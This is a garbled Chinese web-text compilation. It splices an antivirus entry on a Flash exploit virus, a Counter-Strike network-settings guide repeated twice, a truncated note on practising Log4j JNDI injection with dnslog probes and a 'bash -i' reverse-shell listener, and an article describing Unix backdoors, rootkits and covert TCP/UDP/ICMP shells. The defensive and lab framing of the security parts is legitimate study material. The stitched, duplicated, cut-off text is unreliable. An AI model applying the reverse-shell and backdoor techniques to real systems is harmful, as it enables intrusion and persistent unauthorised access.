中 文 名:“Flash蛀虫”变种
病毒长度:1546字节
病毒类型:脚本
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
病毒描述:
ExploitCVE-2007-0071“Flash蛀虫”变种是脚本病毒家族的最新成员之一,采用javascript脚本语言和Flash脚本语言编写而成,并且代码经过加密处理。“Flash蛀虫”变种是一个利用“Adobe Flash Player”漏洞进行传播其它病毒的网页脚本病毒。“Flash蛀虫”变种一般内嵌在正常网页中,如果用户计算机没有升级安装“Adobe Flash Player”提供的相应的漏洞补丁,那么当用户使用浏览器访问带有“Flash蛀虫”变种的恶意网页时,就会在当前用户计算机的后台连接骇客指定远程服务器站点,下载恶意程序并自动调用运行。其中所下载的恶意程序可能是网游木马、流氓广告、病毒后门等,会给被感染计算机用户带来一定的损失。
“映像劫持者”变种a,看上去可能比较麻烦点了,只能先靠人眼搜索杀毒了。即找到病毒文件后手动删除!ex_interp forced up to 33 mse-被强制设成XX毫秒
我建议你只修改“cl_updaterate”,而让你的CS来自动修改“ex_interp”。你现在不能把“ex_interp”设置的低于“1/cl_updaterate”,而把它设高则导致了你射击对手的时候不得不瞄准出现在屏幕上的人的后面,这种行为通常被认为是exploit。比如,如果你的“cl_updaterate”是101,你“ex_interp”的正确值就是“1/101=0009”(9毫秒)。
在cs16中,当cl_updaterate数值足够且网络状况良好的情况下,ex_interp为01或ex_interp为“1/cl_updaterate数值”这2种设置并没有实际区别。采用其中任何一种设置均获得近似相等的效果,并不存在所谓的不公平性因素。
你可以只打 rcon sv_maxupdaterate 看看这个数值是多少
===============================================
以下内容慢慢看、、呵呵、、、
-----------------------------------------------
rate:
我已经确认过rate最高是20000,设成20000以上是没有任何意义的,甚至有可能会降低性能。
推荐值:
rate 20000
sv_maxrate:
这个值通常会被设成0。对于在线游戏来说,这并不是最优值。“sv_maxrate 0”会自动监测所有玩家的
连接速度,并满足每个人的要求。假定“半条命”允许玩家使用超过20000的“rate”值,如果一个玩家疯到
把“rate”设成999999999,服务器会满足他的要求。这不仅导致了带宽的浪费,也导致了服务器过载。因此
我推荐一个更安全的值“20000”。事实上,“sv_maxrate 0”和“sv_maxrate 20000”有可能效果是相同
的,但是预防措施总是没有坏处的。
推荐值:
sv_maxrate 20000
cl_cmdrate:
这个参数的理想值应该是和服务器的FPS一样(而不是原来大家认为的客户端FPS)。如果你向服务器端发
出的更新超过服务器本身的FPS,通常那些多余的数据包就会被丢弃掉。因此,“cl_cmdrate”设置过高没有
什么大坏处,但是它浪费了你的带宽。
推荐值:
cl_cmdrate 等于或者大于服务器FPS
ex_interp:
把这个值设成0。CS会自动把你的“ex_interp”设成“1/cl_updaterate”(你的命令台会告诉你
“ex_interp”被强制设成XX毫秒。原文“ex_interp forced up to xx msec”)。这是因为两个数据包之
间的时间间隔就正好是1/(每秒更新次数),这就是你需要客户端做出插值预测的时间长度。调整
“cl_updaterate”会自动调整“ex_interp”(当“ex_interp”设成0的时候)。我建议你只修改
“cl_updaterate”,而让你的CS来自动修改“ex_interp”。你现在不能把“ex_interp”设置的低于
“1/cl_updaterate”,而把它设高则导致了你射击对手的时候不得不瞄准出现在你屏幕上的人的后方,这种
行为通常被认为是作弊(原文exploit,因为欧美比赛中exploit也算是作弊的一种,因此这里就直接翻译成
作弊了)。比如,如果你的“cl_updaterate”是101,你“ex_interp”的正确值就是“1/101=0009”(9
毫秒)。而使用默认值01就形成了前述的“作弊”(又是exploit,我ft)
推荐值:
ex_interp 0
cl_updaterate:
很长时间以来的做法是让“cl_updaterate”从101开始下降,降到你可以接受的“choke”值。可以用命
令“net_graph 3”来查看“choke”。对我来讲,“choke”是我最后才关心的一个数值。事实上得到
“cl_updaterate”的最优值是更为复杂的。CAL比赛服务器端设置都是“sv_maxupdaterate 101”,所有有
人可能会觉得“cl_updaterate”应该设成101。理想状态下,这是对的,但现实中这并不正确。美国大部分
的服务器并不能提供100FPS,这就意味着每秒钟服务器不可能发出100次更新。因此“cl_updaterate 101”
除了让你的“ex_interp”变成0009之外,并不能保证你每秒钟都收到100次更新,这就导致了玩家们的游戏
感觉不断在变。既然没有(除非有远程控制权,“rcon stats”)知道服务器FPS的方法,我们就不得不猜测
“cl_updaterate”的最优值。你可能说:“不妨把“cl_updaterate”设成101,这样就保证了能尽可能多
的接收到数据包”。这样做的问题是忽视了“cl_updaterate”对“ex_interp”的影响,而实际上你的
“ex_interp”应该设的更高。
为了找出最优的“cl_updaterate”值(记得把“ex_interp”设成0),将其值从101开始下降直到游戏
中的人物只有非常轻微的抖动。“轻微的抖动”的程度只是个人的偏好而已,只要你的“ex_interp”等于
“1/cl_updaterate”,游戏中的人物就应该是在正确的位置上。你必须针对每个服务器来调整你的
“cl_updaterate”。别害怕使用低于50的“cl_updaterate”值。预测机制会发挥它的作用。注意:大多数
公众服务器会把“sv_maxupdaterate”设成30,这时“cl_updaterate 30”就是最正确的。
请注意“cl_updaterate”从低向高调整是行不通的。一旦你的“cl_updaterate”设置到了一个较高的
值,“ex_interp”并不会自动调整,而你不得不一次又一次的手动输入“ex_interp 0”。下面是我写的一
个调整“cl_updaterate”的很方便的脚本:
调整更新速度的设置文件
推荐值:
“cl_updaterate”应该等于服务器的FPS,而且不应该超过服务器的 “sv_maxupdaterate”值。
sys_ticrate:
寻找合适的“sys_ticrate”值需要做一些试验。首先,如果你的服务器fps没有被提高到100以上,那么
把这个值设成大于100是毫无意义的。如果你碰巧租到的是一个高性能服务器(即FPS被提升过),那么你就可
以对“sys_ticrate”做点什么了。尽管越高的FPS是件好事,但是把“sys_ticrate”设置的超过200通常不
是件好事。比如你把“sys_ticrate”设成9999, 你的服务器FPS则会随着当前地图上的战况而在150到1000
之间晃悠。因此把它设置的低于200,会提供一个更稳定的游戏环境。通常,服务其提供商的每台计算机都会
运行多个“半条命”服务器,所以如果所有这些服务器的“sys_ticrate”很高的话,就会占用极大的CPU资
源。而使得每个“半条命”服务器上的玩家都感觉不爽。(并且多半你的服务器供应商还会增加月租金)。
最后,服务器的FPS只能是某些特定的数。比如,我的服务器只能工作在85、102、128、170、256等几个
FPS下,而且不会出现其它的FPS值。如果你把“sys_ticrate”设成100,你的服务器会自动选取小于100的那
个工作值(上面情况下,将是85)。所以请试着在你想要的FPS上加上20到50,来设置“sys_ticrate”。
推荐值:
sys_ticrate 110-180, 取决于你服务器的质量。
局域网赛事注意事项:
那些局域网赛事的主办者,比如CPL,使用“cl_updaterate 101”的原因是由于他们使用了高品质的服
务器。如果服务器的FPS被提高到100以上,那么使用“cl_updaterate 101”就是一个合理的值。一个快速的
查看你局域网服务器FPS是否被提高的方法是看玩家的ping。一个运行在50或者64FPS的默认服务器通常会让
玩家的ping超过15毫秒,而一个被提升的服务器则会提供一个远小于此的ping值,通常是在5毫秒左右。就我
所知,CPL、ESWC和WCG都是使用的提升过的服务器。
本文将深入探讨一些CS中有争议的关于网络的参数。网络参数是一个相对新的课题,那些顶尖的选手也是从
13时代欧洲与美洲的激烈碰撞中才开始注意到的。在15的时代,选手们开始认真研究特定网络参数的意义。
事实上,大多数人直接采用了别人的正确设置。尽管如此,到了16,Valve修正了代码中的一个错误,反而造
成了更多的混乱。原来正确的设置由于Valve的反作弊程序(VAC)而不能发挥其效力。你们中的有些人可能由于
我很久之前的那篇“ex_参数解析”的文章而记得我。
这个观点是通过两年来试验和观察累计而成的。近来有些事情使我提起了对网络参数的兴趣:网管强
迫玩家使用错误的参数,局域网赛事中选手由于使用正确的参数而被取消资格等等。最近我通过和一位Valve
员工之间的一系列通信而确认了本文中的大部分内容。(对于你们关于demo问题的那些疑问,Valve确实在研
究解决方案。)要声明的是,本文所含内容不会使你成为另外一个“Spawn”,但是可以消除错误的对他人关
于网络参数的指责并提供一个更加平衡的竞技环境。
下面,我将对我认为重要的网络参数给出一个概述并介绍一下其背景。然后我会给出网络参数建议
值,并解释为何如此建议。
请注意:
以“sv_”或者“sys_”开头的参数是服务器端参数,如需修改必须用远程控制命令“rcon”修改。
直接修改该参数将导致本地机器的参数被修改,而不是服务器上的参数。
“ex_interp”和“cl_updaterate”两个参数之间的关系极端重要,阅读下文关于其中任何一个的
时候,也请阅读关于另外一个的部分。
本文阅读对象主要是那些用宽带上网的读者。
一般信息:
cl_cmdrate:
这个参数决定了每秒钟你--即客户端发给服务器多少个数据包。很显然,这个值越高,服务器对你执
行的命令的响应就越快。如果你拥有宽带网并且是其唯一使用者,把此值设高对你没什么坏处。如果你和你的
朋友在一处上网打CS,并且能感觉到经常出现延迟的现象,那么这个命令就是罪魁祸首。大多数的宽带(主要
是ADSL)并不提供足够的上传带宽,而这恰恰是“cl_cmdrate”所需要的。
cl_updaterate:
“cl_updaterate”和“cl_cmdrate”颇为类似,只是反其道而行之。它控制的是每秒钟你从服务
器端接收的数据包的数量。因此,它依赖的是你的下载速度。你的“cl_updaterate”值越高,你和服务器的
同步率就越高。既然只有服务器能决定你是否打中了,你当然希望收到足够多的数据包以保持和服务器同步。
sv_maxupdaterate:
如同“cl_updaterate”控制每秒钟客户端发给服务器端的最大数据包数量,
“sv_maxupdaterate”就是每秒钟服务器端允许客户端接收的最大数据包数量。因此,把
“cl_updaterate”设置的高于“sv_maxupdaterate”是毫无意义的。
sys_ticrate:
这个参数设定的是每秒钟服务器将计算出的帧数。默认值是100。为什么服务器的FPS(每秒钟的帧
数)重要呢?这个参数本身决定了你在这个服务器上的感觉。我肯定我们都有过这种经验:有些服务器好像是
架设在“深蓝”(或者曙光?龙芯?呵呵)上,而我们就好像是在局域网里打比赛一样。
“sys_ticrate”只是设定你服务器的最大FPS。一般来说,你的服务器不会达到这个值,因为你的
*** 作系统并不允许你这样。有很多种不同的方法来提升服务器的FPS,但是其中很多种都需要服务器提供商的
合作。请记住,提高服务器的FPS会导致服务器提供商的机器CPU加重负担,因此多半服务器供应商们不会这么
做。(出于某种原因,在de_inferno和de_aztec上提高服务器的FPS会导致CPU过载)。基于Windows的“半
条命”服务器的默认FPS是64,而基于Linux的服务器的默认FPS是50。某些情况下,你可以把服务器FPS提高
到512。是否使用如此之高的服务器FPS现在还有争议,但是就我个人的经验,通常在200FPS下你的游戏感觉会
有明显的改善。
稳定性是关键。FPS在100和512之间跳来跳去只会使你的游戏感觉更糟糕,因此当你的服务器一般状
态下是150FPS的时候,不妨把“sys_ticrate”设成150。
如果你有服务器的远程控制权限并且想知道服务器当前的FPS,那么就在命令台中输入“rcon
stats”。要检查你的服务器有没有被提升过,暂时把“sys_ticrate”设成10000,并输入“rcon
stats”。如果你的服务器FPS大于100,那么你的服务器就是被提升过了。
ex_interp:
开始之前,韦氏大辞典如下定义“interpolate”(插值):
Main Entry: in·ter·po·late (主要词条: interpolate)
3 : to estimate values of (a function) between two known values (3:估计两个已知
函数值中间的函数值)
intransitive senses : to make insertions (as of estimated values) (不及物动词:
插入(在估计值的时候))
对于在线游戏的推荐值:
rate:
我已经确认过rate最高是20000,设成20000以上是没有任何意义的,甚至有可能会降低性能。
推荐值:
rate 20000
sv_maxrate:
这个值通常会被设成0。对于在线游戏来说,这并不是最优值。“sv_maxrate 0”会自动监测所有玩家的
连接速度,并满足每个人的要求。假定“半条命”允许玩家使用超过20000的“rate”值,如果一个玩家疯到
把“rate”设成999999999,服务器会满足他的要求。这不仅导致了带宽的浪费,也导致了服务器过载。因此
我推荐一个更安全的值“20000”。事实上,“sv_maxrate 0”和“sv_maxrate 20000”有可能效果是相同
的,但是预防措施总是没有坏处的。
推荐值:
sv_maxrate 20000
cl_cmdrate:
这个参数的理想值应该是和服务器的FPS一样(而不是原来大家认为的客户端FPS)。如果你向服务器端发
出的更新超过服务器本身的FPS,通常那些多余的数据包就会被丢弃掉。因此,“cl_cmdrate”设置过高没有
什么大坏处,但是它浪费了你的带宽。
推荐值:
cl_cmdrate 等于或者大于服务器FPS
ex_interp:
把这个值设成0。CS会自动把你的“ex_interp”设成“1/cl_updaterate”(你的命令台会告诉你
“ex_interp”被强制设成XX毫秒。原文“ex_interp forced up to xx msec”)。这是因为两个数据包之
间的时间间隔就正好是1/(每秒更新次数),这就是你需要客户端做出插值预测的时间长度。调整
“cl_updaterate”会自动调整“ex_interp”(当“ex_interp”设成0的时候)。我建议你只修改
“cl_updaterate”,而让你的CS来自动修改“ex_interp”。你现在不能把“ex_interp”设置的低于
“1/cl_updaterate”,而把它设高则导致了你射击对手的时候不得不瞄准出现在你屏幕上的人的后方,这种
行为通常被认为是作弊(原文exploit,因为欧美比赛中exploit也算是作弊的一种,因此这里就直接翻译成
作弊了)。比如,如果你的“cl_updaterate”是101,你“ex_interp”的正确值就是“1/101=0009”(9
毫秒)。而使用默认值01就形成了前述的“作弊”(又是exploit,我ft)
推荐值:
ex_interp 0
cl_updaterate:
很长时间以来的做法是让“cl_updaterate”从101开始下降,降到你可以接受的“choke”值。可以用命
令“net_graph 3”来查看“choke”。对我来讲,“choke”是我最后才关心的一个数值。事实上得到
“cl_updaterate”的最优值是更为复杂的。CAL比赛服务器端设置都是“sv_maxupdaterate 101”,所有有
人可能会觉得“cl_updaterate”应该设成101。理想状态下,这是对的,但现实中这并不正确。美国大部分
的服务器并不能提供100FPS,这就意味着每秒钟服务器不可能发出100次更新。因此“cl_updaterate 101”
除了让你的“ex_interp”变成0009之外,并不能保证你每秒钟都收到100次更新,这就导致了玩家们的游戏
感觉不断在变。既然没有(除非有远程控制权,“rcon stats”)知道服务器FPS的方法,我们就不得不猜测
“cl_updaterate”的最优值。你可能说:“不妨把“cl_updaterate”设成101,这样就保证了能尽可能多
的接收到数据包”。这样做的问题是忽视了“cl_updaterate”对“ex_interp”的影响,而实际上你的
“ex_interp”应该设的更高。
为了找出最优的“cl_updaterate”值(记得把“ex_interp”设成0),将其值从101开始下降直到游戏
中的人物只有非常轻微的抖动。“轻微的抖动”的程度只是个人的偏好而已,只要你的“ex_interp”等于
“1/cl_updaterate”,游戏中的人物就应该是在正确的位置上。你必须针对每个服务器来调整你的
“cl_updaterate”。别害怕使用低于50的“cl_updaterate”值。预测机制会发挥它的作用。注意:大多数
公众服务器会把“sv_maxupdaterate”设成30,这时“cl_updaterate 30”就是最正确的。
请注意“cl_updaterate”从低向高调整是行不通的。一旦你的“cl_updaterate”设置到了一个较高的
值,“ex_interp”并不会自动调整,而你不得不一次又一次的手动输入“ex_interp 0”。下面是我写的一
个调整“cl_updaterate”的很方便的脚本:
调整更新速度的设置文件
推荐值:
“cl_updaterate”应该等于服务器的FPS,而且不应该超过服务器的 “sv_maxupdaterate”值。
sys_ticrate:
寻找合适的“sys_ticrate”值需要做一些试验。首先,如果你的服务器fps没有被提高到100以上,那么
把这个值设成大于100是毫无意义的。如果你碰巧租到的是一个高性能服务器(即FPS被提升过),那么你就可
以对“sys_ticrate”做点什么了。尽管越高的FPS是件好事,但是把“sys_ticrate”设置的超过200通常不
是件好事。比如你把“sys_ticrate”设成9999, 你的服务器FPS则会随着当前地图上的战况而在150到1000
之间晃悠。因此把它设置的低于200,会提供一个更稳定的游戏环境。通常,服务其提供商的每台计算机都会
运行多个“半条命”服务器,所以如果所有这些服务器的“sys_ticrate”很高的话,就会占用极大的CPU资
源。而使得每个“半条命”服务器上的玩家都感觉不爽。(并且多半你的服务器供应商还会增加月租金)。
最后,服务器的FPS只能是某些特定的数。比如,我的服务器只能工作在85、102、128、170、256等几个
FPS下,而且不会出现其它的FPS值。如果你把“sys_ticrate”设成100,你的服务器会自动选取小于100的那
个工作值(上面情况下,将是85)。所以请试着在你想要的FPS上加上20到50,来设置“sys_ticrate”。
推荐值:
sys_ticrate 110-180, 取决于你服务器的质量。
局域网赛事注意事项:
那些局域网赛事的主办者,比如CPL,使用“cl_updaterate 101”的原因是由于他们使用了高品质的服
务器。如果服务器的FPS被提高到100以上,那么使用“cl_updaterate 101”就是一个合理的值。一个快速的
查看你局域网服务器FPS是否被提高的方法是看玩家的ping。一个运行在50或者64FPS的默认服务器通常会让
玩家的ping超过15毫秒,而一个被提升的服务器则会提供一个远小于此的ping值,通常是在5毫秒左右。就我
所知,CPL、ESWC和WCG都是使用的提升过的服务器。
本文将深入探讨一些CS中有争议的关于网络的参数。网络参数是一个相对新的课题,那些顶尖的选手也是从
13时代欧洲与美洲的激烈碰撞中才开始注意到的。在15的时代,选手们开始认真研究特定网络参数的意义。
事实上,大多数人直接采用了别人的正确设置。尽管如此,到了16,Valve修正了代码中的一个错误,反而造
成了更多的混乱。原来正确的设置由于Valve的反作弊程序(VAC)而不能发挥其效力。你们中的有些人可能由于
我很久之前的那篇“ex_参数解析”的文章而记得我。
这个观点是通过两年来试验和观察累计而成的。近来有些事情使我提起了对网络参数的兴趣:网管强
迫玩家使用错误的参数,局域网赛事中选手由于使用正确的参数而被取消资格等等。最近我通过和一位Valve
员工之间的一系列通信而确认了本文中的大部分内容。(对于你们关于demo问题的那些疑问,Valve确实在研
究解决方案。)要声明的是,本文所含内容不会使你成为另外一个“Spawn”,但是可以消除错误的对他人关
于网络参数的指责并提供一个更加平衡的竞技环境。
下面,我将对我认为重要的网络参数给出一个概述并介绍一下其背景。然后我会给出网络参数建议
值,并解释为何如此建议。
请注意:
以“sv_”或者“sys_”开头的参数是服务器端参数,如需修改必须用远程控制命令“rcon”修改。
直接修改该参数将导致本地机器的参数被修改,而不是服务器上的参数。
“ex_interp”和“cl_updaterate”两个参数之间的关系极端重要,阅读下文关于其中任何一个的
时候,也请阅读关于另外一个的部分。
本文阅读对象主要是那些用宽带上网的读者。
一般信息:
cl_cmdrate:
这个参数决定了每秒钟你--即客户端发给服务器多少个数据包。很显然,这个值越高,服务器对你执
行的命令的响应就越快。如果你拥有宽带网并且是其唯一使用者,把此值设高对你没什么坏处。如果你和你的
朋友在一处上网打CS,并且能感觉到经常出现延迟的现象,那么这个命令就是罪魁祸首。大多数的宽带(主要
是ADSL)并不提供足够的上传带宽,而这恰恰是“cl_cmdrate”所需要的。
cl_updaterate:
“cl_updaterate”和“cl_cmdrate”颇为类似,只是反其道而行之。它控制的是每秒钟你从服务
器端接收的数据包的数量。因此,它依赖的是你的下载速度。你的“cl_updaterate”值越高,你和服务器的
同步率就越高。既然只有服务器能决定你是否打中了,你当然希望收到足够多的数据包以保持和服务器同步。
sv_maxupdaterate:
如同“cl_updaterate”控制每秒钟客户端发给服务器端的最大数据包数量,
“sv_maxupdaterate”就是每秒钟服务器端允许客户端接收的最大数据包数量。因此,把
“cl_updaterate”设置的高于“sv_maxupdaterate”是毫无意义的。
sys_ticrate:
这个参数设定的是每秒钟服务器将计算出的帧数。默认值是100。为什么服务器的FPS(每秒钟的帧
数)重要呢?这个参数本身决定了你在这个服务器上的感觉。我肯定我们都有过这种经验:有些服务器好像是
架设在“深蓝”(或者曙光?龙芯?呵呵)上,而我们就好像是在局域网里打比赛一样。
“sys_ticrate”只是设定你服务器的最大FPS。一般来说,你的服务器不会达到这个值,因为你的
*** 作系统并不允许你这样。有很多种不同的方法来提升服务器的FPS,但是其中很多种都需要服务器提供商的
合作。请记住,提高服务器的FPS会导致服务器提供商的机器CPU加重负担,因此多半服务器供应商们不会这么
做。(出于某种原因,在de_inferno和de_aztec上提高服务器的FPS会导致CPU过载)。基于Windows的“半
条命”服务器的默认FPS是64,而基于Linux的服务器的默认FPS是50。某些情况下,你可以把服务器FPS提高
到512。是否使用如此之高的服务器FPS现在还有争议,但是就我个人的经验,通常在200FPS下你的游戏感觉会
有明显的改善。
稳定性是关键。FPS在100和512之间跳来跳去只会使你的游戏感觉更糟糕,因此当你的服务器一般状
态下是150FPS的时候,不妨把“sys_ticrate”设成150。
如果你有服务器的远程控制权限并且想知道服务器当前的FPS,那么就在命令台中输入“rcon
stats”。要检查你的服务器有没有被提升过,暂时把“sys_ticrate”设成10000,并输入“rcon
stats”。如果你的服务器FPS大于100,那么你的服务器就是被提升过了。
ex_interp:
开始之前,韦氏大辞典如下定义“interpolate”(插值):
Main Entry: in·ter·po·late (主要词条: interpolate)
3 : to estimate values of (a function) between two known values (3:估计两个已知
函数值中间的函数值)
intransitive senses : to make insertions (as of estimated values) (不及物动词:
插入(在估计值的时候))服务器到期的最后几个小时 先 *** 作一波~
1:exp jar包 JNDI-Injection-Exploit
2:利用dnslog平台做初步验证
3:一台服务器作为反dshell监听, 如果没有服务器可以去百度下NATappAPP、花生壳等做本机隐射
4:靶机平台百度搜一堆, 封神台、cftshow等
5:注意的坑:服务器端口需要开放, 服务器若是在阿里云、腾讯云直接装宝塔(作为一个PHP叼毛开发用宝塔是真香,商城中的各种环境,文件上传,开端口等~~~)
1: 先去dnslog获取一个地址,提交到cft练手(靶机)的平台,看是否存在Log4j日志漏洞
漏洞基于ldap协议 , 提交到靶场的平台。
提交后dns解析返回 , 确定存在该漏洞。
1: 对bash -i 进行base64编码( >分类: 电脑/网络 >> 反病毒
解析:
当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在。
/按照正常 *** 作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便日后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉。
这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用。
cachebaidu/cword=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=%3A%2Exiaom%2E/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=baidu
什么是后门
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门本文将讨论许多常见的后门及其检测方法 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法
大多数入侵者的后门实现以下二到三个目的:
即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入 使再次侵入被发现的可能性减至最低大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器 这也不会引起管理员的注意 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门
密码破解后门
这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门 这就是破解口令薄弱的帐号 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号因而管理员很难确定查封哪个帐号
Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法 用户可以轻易的改变设置而不需口令就能进入 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号 特别当home目录通过NFS向外共享时, 入侵者更热中于此 这些帐号也成了入侵者再次侵入的后门 许多人更喜欢使用Rsh, 因为它通常缺少日志能力 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现
校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件 系统管理员便依时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序 入侵者又发展了使trojan文件和原文件时间戳同步的新技术 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间 sum程序是基于CRC校验, 很容易
骗过入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序 MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过
Login后门
在Unix里,login程序通常用来对tel来的用户进行口令验证 入侵者获取loginc的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入 这将允许入侵者进入任何帐号,甚至是root由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息 许多情况下后门口令会原形毕露入侵者就开始加密或者更好的隐藏口令, 使strings命令失效 所以更多的管理员是用MD5校验和检测这种后门的
Teld后门
当用户tel到系统, 监听端口的id服务接受连接随后递给inteld,由它运行login一些入侵者知道管理员会检查login是否被修改, 就着手修改inteld在inteld内部有一些对用户信息的检验, 比如用户使用了何种终端 典型的终端设置是Xterm或者VT100入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell
服务后门
几乎所有网络服务曾被入侵者作过后门 finger, rsh, rexec, rlogin, ftp, 甚至id等等的作了的版本随处多是 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问这些程序有时用刺娲□?ucp这样不用的服务,或者被加入idconf作为一个新的服务管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问 也可以查看cronjob中经常运行的合法程序,同时置入后门
库后门
几乎所有的UNIX系统使用共享库 共享库用于相同函数的重用而减少代码长度 一些入侵者在象cryptc和_cryptc这些函数里作了后门 象loginc这样的程序调用了crypt(),当使用后门口令时产生一个shell 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数而且许多管理员并不会检查库是否被做了后门对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验 有一种办法是入侵者对open()和文件访问函数做后门 后门函数读原文件但执行trojan后门程序 所以 当MD5读这些文件时,校验和一切正常 但当系统运行时将执行trojan版本的 即使trojan库本身也可躲过MD5校验 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行静态连接程序不会使用trojan共享库
内核后门
内核是Unix工作的核心 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区 因此入侵者只能用特别的工具访问这些隐藏的文件 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在
Boot块后门
在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变 Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区
隐匿进程后门
入侵者通常想隐匿他们运行的程序 这样的程序一般是口令破解程序和监听程序 (sniffer)有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名 可以将sniffer程序改名类似insyslog再执行 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名 可以修改库函数致使
"ps"不能显示所有进程 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现 使用这个技术的一个后门例子是amodtargz :
starniimmspbsu/~maillist/bugtraq1/0777
也可以修改内核隐匿进程
Rootkit
最流行的后门安装包之一是rootkit 它很容易用web搜索器找到从Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog
Es - rokstar's ether sniffer for sun4 based kernels
Fix - try to fake checksums, install with same dates/perms/u/g
Sl - bee root via a magic password sent to login
Ic - modified ifconfig to remove PROMISC flag from output
ps: - hides the processes
Ns - modified stat to hide connections to certain machines
Ls - hides certain directories and files from being listed
du5 - hides how much space is being used on your hard drive
ls5 - hides certain files and directories from being listed
网络通行后门
入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行 这些网络通行后门有时允许入侵者通过防火墙进行访问 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问 管理员可以用stat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉 通常这些后门可以让入侵者躲过TCP Wrapper技术 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以stat不能显示入侵者的访问痕迹 许多防火墙设置成允许类似DNS的UDP报文的通行 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一 许多防火墙允许外界ping它内部的机器 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了
Windows NT
